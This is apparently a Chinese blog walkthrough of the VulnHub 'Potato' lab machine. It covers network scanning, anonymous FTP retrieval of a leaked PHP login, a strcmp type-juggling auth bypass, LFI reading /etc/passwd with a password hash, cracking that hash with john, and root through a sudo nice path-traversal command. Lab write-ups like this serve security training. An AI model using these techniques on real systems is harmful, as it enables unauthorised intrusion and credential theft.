Potato
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.85.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.114 08:00:27:77:c6:7c 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:b5:6e:e2 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.114
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.114 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 01:55 EST
Nmap scan report for bogon (192.168.56.114)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
| 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
MAC Address: 08:00:27:77:C6:7C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
目标主机有3个开放端口22(SSH),80(http)以及2112(ftp)
Get Access
从FTP服务着手信息的收集,
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ftp 192.168.56.114 -P 2112
Connected to 192.168.56.114.
220 ProFTPD Server (Debian) [::ffff:192.168.56.114]
Name (192.168.56.114:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.56.107 !
230-
230-The local time is: Fri Nov 11 14:57:04 2022
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47701|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4.0k Aug 2 2020 .
drwxr-xr-x 2 ftp ftp 4.0k Aug 2 2020 ..
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||5403|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
901 29.58 KiB/s
226 Transfer complete
901 bytes received in 00:00 (14.61 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||1134|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
54 941.68 KiB/s
226 Transfer complete
54 bytes received in 00:00 (46.29 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ls
index.php.bak nmap_full_scan welcome.msg
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat index.php.bak
<html>
<head></head>
<body>
<?php
$pass= "potato"; //note Change this password regularly
if($_GET['login']==="1"){
if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
setcookie('pass', $pass, time() + 365*24*3600);
}else{
echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
}
exit();
}
?>
<form action="index.php?login=1" method="POST">
<h1>Login</h1>
<label><b>User:</b></label>
<input type="text" name="username" required>
</br>
<label><b>Password:</b></label>
<input type="password" name="password" required>
</br>
<input type="submit" id='submit' value='Login' >
</form>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
目标主机允许FTP匿名访问,将文件下载到本地,竟然发现了用户名和密码,太惊喜了
admin
potato
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ gobuster dir -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/11 01:59:23 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 316] [--> http://192.168.56.114/admin/]
/potato (Status: 301) [Size: 317] [--> http://192.168.56.114/potato/]
/server-status (Status: 403) [Size: 279]
Progress: 219152 / 220561 (99.36%)===============================================================
2022/11/11 02:00:08 Finished
===============================================================
发现了/admin目录,利用上面发现的用户名和密码登录该页面
但发现并不能成功登录,非常奇怪,尝试了很多次,一直提示密码错误,其实这里是一个坑
PHP里等号只判断它们左右两边的最终结果值,而不判断数据类型.而全等于首先判断等号两边的数据类型是否一致.接着还要判断两边的最终结果值是否一致.如果都一致才会返回true呢.
在网上找到一种利用方法,最终利用的是PHP中NULL == 0的特性
简单来说就是原本password参数应该提交一个字符串,但这里提交一个空数组,这样strcmp()的结果就是NULL,而php中松散比较(==)时NULL等于0,因此满足条件,可以成功登录
成功登录
在Logs栏目下,利用burp工具分析请求,发现选择某个文件时,提交的POST请求体中有参数file,看是否存在本地文件包含漏洞(LFI)
发现存在LFI漏洞,可以读取/etc/passwd文件
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12👨/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network❌100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve❌101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync❌102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus❌103:106::/nonexistent:/usr/sbin/nologin
syslog❌104:110::/home/syslog:/usr/sbin/nologin
_apt❌105:65534::/nonexistent:/usr/sbin/nologin
tss❌106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd❌107:112::/run/uuidd:/usr/sbin/nologin
tcpdump❌108:113::/nonexistent:/usr/sbin/nologin
landscape❌109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate❌110:1::/var/cache/pollinate:/bin/false
sshd❌111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump❌999:999:systemd Core Dumper:/:/usr/sbin/nologin
florianges❌1000:1000:florianges:/home/florianges:/bin/bash
lxd❌998💯:/var/snap/lxd/common/lxd:/bin/false
proftpd❌112:65534::/run/proftpd:/usr/sbin/nologin
ftp❌113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
web admin加密后的密码是$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ echo '$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/' > webadmin_hash
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat webadmin_hash
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ john --wordlist=/usr/share/wordlists/fasttrack.txt webadmin_hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 88.58% (ETA: 02:19:38) 0g/s 0p/s 0c/s 0C/s
Session aborted
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt webadmin_hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragon (?)
1g 0:00:00:00 DONE (2022-11-11 02:21) 6.250g/s 1200p/s 1200c/s 1200C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ssh webadmin@192.168.56.114
The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established.
ED25519 key fingerprint is SHA256:9DQds4tRzLVKtayQC3VgIo53wDRYtKzwBRgF14XKjCg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts.
webadmin@192.168.56.114's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 11 Nov 2022 03:22:00 PM UTC
System load: 0.24 Processes: 115
Usage of /: 11.9% of 31.37GB Users logged in: 0
Memory usage: 36% IPv4 address for enp0s3: 192.168.56.114
Swap usage: 0%
61 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Aug 2 19:56:20 2020 from 192.168.1.11
webadmin@serv:~$ id
uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin)
webadmin@serv:~$
提权
webadmin@serv:~$ sudo -l
[sudo] password for webadmin:
Matching Defaults entries for webadmin on serv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*
webadmin@serv:~$ sudo /bin/nice /notes/../bin/bash
root@serv:/home/webadmin# cd /root
root@serv:~# ls
root.txt snap
root@serv:~# cat root.txt
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==
root@serv:~#
原文地址:http://www.cnblogs.com/jason-huawen/p/16880632.html
